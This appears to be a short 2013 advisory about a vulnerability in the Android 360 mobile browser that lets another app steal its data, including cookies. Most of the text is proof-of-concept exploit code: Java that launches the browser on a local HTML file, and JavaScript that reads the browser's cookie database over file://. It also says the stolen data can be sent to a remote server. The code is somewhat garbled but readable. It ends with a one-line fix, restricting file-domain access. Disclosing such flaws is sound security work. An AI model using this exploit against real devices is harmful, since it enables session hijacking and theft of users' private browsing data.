When an attack app (both malicious and non-malicious) sends a request to the 360 browser to open a local page, on this local page, you can obtain all the data in the 360 browser according to the attack app requirements, including cookie information. The stealing process does not require the root user. After stealing, you can send the data to a remote server!
Android platform 360 mobile browser MD5: 5b252a142a492b34bd3253acb51882bd September 22, 2013
CopyFile (); // customizable, release filehe.html to the SD card String url = "file: // mnt/sdcard/filehe.html"; Intent contIntent = new Intent (); contIntent. setAction ("android. intent. action. VIEW "); contIntent. setData (Uri. parse (url); Intent intent = new Intent (); intent. setClassName ("com. qihoo. browser "," com. qihoo. browser. browserActivity "); intent. setAction ("android. intent. action. VIEW "); intent. setData (Uri. parse (url); this. startActivity (intent );
The filehe.html file that obtains critical information:
Function getDatabase () {var request = false; if (window. XMLHttpRequest) {request = new XMLHttpRequest (); if (request. overrideMimeType) {request. overrideMimeType ('text/xml') ;}} xmlhttp = request; var prefix = "file: // data/com. qihoo. browser/databases "; var postfix ="/webviewCookiesChromium. db "; // retrieve the dbvar path = prefix that saves the cookie. concat (postfix); // get the local file code xmlhttp. open ("GET", path, false); xmlhttp. send (null); var ret = xmlhttp. responseText; return ret ;}
Solution:Restrict access to file Domains